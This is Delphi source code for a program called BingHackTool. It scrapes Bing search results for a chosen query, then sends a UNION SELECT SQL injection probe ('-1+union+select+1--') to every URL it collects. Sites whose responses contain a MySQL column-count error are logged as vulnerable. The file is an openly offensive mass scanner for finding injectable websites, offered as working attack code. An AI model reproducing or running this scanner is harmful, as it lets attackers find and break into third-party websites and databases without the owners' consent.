// BingHackTool 0.1
// Coded By Doddy H
unit bing;
interface
uses
Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
Dialogs, StdCtrls, sButton, sMemo, sSkinManager, PerlRegEx, IdBaseComponent,
IdComponent, IdTCPConnection, IdTCPClient, IdHTTP, sEdit, sLabel, sGroupBox,
sListBox, ComCtrls, sStatusBar, ShellApi, jpeg, ExtCtrls;
type
TForm1 = class(TForm)
IdHTTP1: TIdHTTP;
PerlRegEx1: TPerlRegEx;
sSkinManager1: TsSkinManager;
PerlRegEx2: TPerlRegEx;
sGroupBox1: TsGroupBox;
sLabel1: TsLabel;
sEdit1: TsEdit;
sLabel2: TsLabel;
sEdit2: TsEdit;
sGroupBox2: TsGroupBox;
sListBox1: TsListBox;
sGroupBox3: TsGroupBox;
sListBox2: TsListBox;
sStatusBar1: TsStatusBar;
sGroupBox4: TsGroupBox;
sButton1: TsButton;
sButton2: TsButton;
sButton3: TsButton;
sButton4: TsButton;
Image1: TImage;
procedure sButton1Click(Sender: TObject);
procedure sButton4Click(Sender: TObject);
procedure sButton3Click(Sender: TObject);
procedure FormCreate(Sender: TObject);
procedure sButton2Click(Sender: TObject);
procedure sListBox1DblClick(Sender: TObject);
procedure sListBox2DblClick(Sender: TObject);
private
{ Private declarations }
public
{ Public declarations }
end;
var
Form1: TForm1;
implementation
{$R *.dfm}
procedure savefile(filename, texto: string);
var
ar: TextFile;
begin
AssignFile(ar, filename);
FileMode := fmOpenWrite;
if FileExists(filename) then
Append(ar)
else
Rewrite(ar);
Writeln(ar, texto);
CloseFile(ar);
end;
procedure TForm1.FormCreate(Sender: TObject);
var
dir: string;
begin
sSkinManager1.SkinDirectory := ExtractFilePath(Application.ExeName) + 'Data';
sSkinManager1.SkinName := 'falloutstyle';
sSkinManager1.Active := True;
dir := ExtractFilePath(Application.ExeName) + '/logs';
if not(DirectoryExists(dir)) then
begin
CreateDir(dir);
end;
ChDir(dir);
end;
procedure TForm1.sButton1Click(Sender: TObject);
var
code: string;
link1: string;
linkfinal: string;
z: integer;
i: integer;
ii: integer;
chau: TStringList;
target: string;
begin
sListBox1.Items.Clear;
target := StringReplace(sEdit1.text, ' ', '+', []);
sStatusBar1.Panels[0].text := '[+] Loading ...';
Form1.sStatusBar1.Update;
for i := 1 to StrToInt(sEdit2.text) do
begin
ii := i * 10;
sListBox1.Update;
sStatusBar1.Panels[0].text := '[+] Searching in page : ' + IntToStr(ii);
Form1.sStatusBar1.Update;
code := IdHTTP1.Get('http://www.bing.com/search?q=' + target + '&first=' +
IntToStr(ii));
PerlRegEx1.Regex := '<h3><a href="(.*?)"';
PerlRegEx1.Subject := code;
while PerlRegEx1.MatchAgain do
begin
for z := 1 to PerlRegEx1.SubExpressionCount do
link1 := PerlRegEx1.SubExpressions[z];
PerlRegEx2.Regex := '(.*?)=(.*?)';
PerlRegEx2.Subject := link1;
if PerlRegEx2.Match then
begin
linkfinal := PerlRegEx2.SubExpressions[1] + '=';
sListBox1.Items.Add(linkfinal);
end;
end;
end;
chau := TStringList.Create;
chau.Duplicates := dupIgnore;
chau.Sorted := True;
chau.Assign(sListBox1.Items);
sListBox1.Items.Clear;
sListBox1.Items.Assign(chau);
for i := sListBox1.Items.Count - 1 downto 0 do
begin
savefile('bing-search.txt', sListBox1.Items[i]);
end;
sStatusBar1.Panels[0].text := '[+] Done';
Form1.sStatusBar1.Update;
end;
procedure TForm1.sButton2Click(Sender: TObject);
var
i: integer;
code: string;
begin
sListBox2.Items.Clear;
sStatusBar1.Panels[0].text := '[+] Loading ...';
Form1.sStatusBar1.Update;
for i := sListBox1.Items.Count - 1 downto 0 do
begin
try
begin
sStatusBar1.Panels[0].text := '[+] Scanning : ' + sListBox1.Items[i];
Form1.sStatusBar1.Update;
sListBox2.Update;
code := IdHTTP1.Get(sListBox1.Items[i] + '-1+union+select+1--');
PerlRegEx1.Regex :=
'The used SELECT statements have a different number of columns';
PerlRegEx1.Subject := code;
if PerlRegEx1.Match then
begin
sListBox2.Items.Add(sListBox1.Items[i]);
savefile('sqli-founds.txt', sListBox1.Items[i]);
end;
end;
except
on E: EIdHttpProtocolException do
;
on E: Exception do
;
end;
sStatusBar1.Panels[0].text := '[+] Done';
Form1.sStatusBar1.Update;
end;
end;
procedure TForm1.sButton3Click(Sender: TObject);
begin
ShowMessage('Contact to lepuke[at]hotmail[com]');
end;
procedure TForm1.sButton4Click(Sender: TObject);
begin
Form1.Close();
end;
procedure TForm1.sListBox1DblClick(Sender: TObject);
begin
ShellExecute(Handle, 'open', 'bing-search.txt', nil, nil, SW_SHOWNORMAL);
end;
procedure TForm1.sListBox2DblClick(Sender: TObject);
begin
ShellExecute(Handle, 'open', 'sqli-founds.txt', nil, nil, SW_SHOWNORMAL);
end;
end.
// The End ?